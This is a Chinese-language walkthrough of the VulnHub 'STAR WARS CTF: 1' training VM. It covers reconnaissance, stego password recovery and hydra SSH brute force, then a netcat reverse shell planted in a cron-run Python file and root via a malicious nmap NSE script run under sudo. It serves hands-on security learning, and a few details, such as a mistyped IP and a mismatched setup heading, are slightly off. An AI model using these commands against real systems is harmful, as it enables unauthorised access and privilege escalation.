VulnHub渗透测试实战靶场 - STAR WARS CTF: 1
Posted H3rmesk1t
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了VulnHub渗透测试实战靶场 - STAR WARS CTF: 1相关的知识,希望对你有一定的参考价值。
题目描述
Star Wars themed CTF for beginners
This works better with VirtualBox rather than VMware
环境下载
- 戳此进行环境下载
NULLY CYBERSECURITY: 1靶机搭建
- 将下载好的靶机环境,导入 VritualBox,设置为 Host-Only 模式
- 将 VMware 中桥接模式网卡设置为 VritualBox 的 Host-only
- 目标靶机的 IP 地址为:
192.168.56.111
- 攻击机的 IP 地址为:
192.168.56.102
渗透测试
信息搜集
用 Nmap 扫描一下目标靶机的端口信息:
sudo nmap -sS -A -Pn 192.168.56.111
,发现开放了22、80
两个端口
用 dirb 扫描一下 80 端口 web 目录:
dirb http://192.168.56.111
漏洞挖掘
- 访问
http://192.168.56.111/robots.txt
,提示
Why does the Jedi Order keep checking the robots.txt file.
Might take a look at /r2d2
He is the real OG.
- 根据提示访问
http://192.168.56.111/r2d2
- 查看
http://192.168.56.111/index.html
源代码,发现注释中有串 base64 字符串注明是密码,解密后出现了滑稽的一幕,先记录一下等会试试有没有用
- 注意到前面的页面中存在两张照片,访问
http://192.168.56.111/images/
,正好是这两张照片,下载下来分析时发现 png 图片有异常的数据,用zsteg
查看一下发现真正的密码:babyYoda123
- 但是不知道用户名是啥,继续用
dirb
探测一下dirb http://192.268.56.111 -X .php,.js,.txt
,发现存在http://192.168.56.111/users.js
,访问得到两个用户名skywalker、han
getshell
- 由于开放了 22 端口,用得到的用户名和密码组合尝试登录 ssh,发现
skywalker:han
可以组合成功
提权
- 查看文件发现
han
家目录下有一个文件夹.secrets
,内有一个note.txt
,查看内容
- 根据
note.txt
的内容,利用cewl
对http://192.168.56.111/r2d2
进行信息收集制作密码集
cewl http://192.168.56.111/r2d2 > pass.txt
- 继续用 hydra 爆破
skywalker
的密码,得到密码:tatooine
hydra -l skywalker -P pass.txt -f -V 192.168.56.111 ssh
- 切换用户到
skywalker
,继续重复前面的操作,发现内容
- 查看用户
Darth
家目录下的内容,同样发现家目录下有一个文件夹.secrets
,内有一个eval.py
,其是一个可读写的可执行 python 文件,这个文件在一分钟后执行,我们修改其内容为
import os
os.system("nc -e /bin/bash 192.168.56.102 1234")
- 起个 nc,等待片刻,成功接收到反弹的 shell,先将 shell 转变成交互式的 shell
SHELL=/bin/bash script -q /dev/null
- 执行
sudo -l
查看,发现可以通过/usr/bin/nmap
来提权,成功拿到 root 权限
echo "os.execute('/bin/sh')" > /tmp/root.nse
sudo /usr/bin/nmap --script=/tmp/root.nse
以上是关于VulnHub渗透测试实战靶场 - STAR WARS CTF: 1的主要内容,如果未能解决你的问题,请参考以下文章
VulnHub渗透测试实战靶场 - Funbox: Lunchbreaker
VulnHub渗透测试实战靶场 - NULLY CYBERSECURITY: 1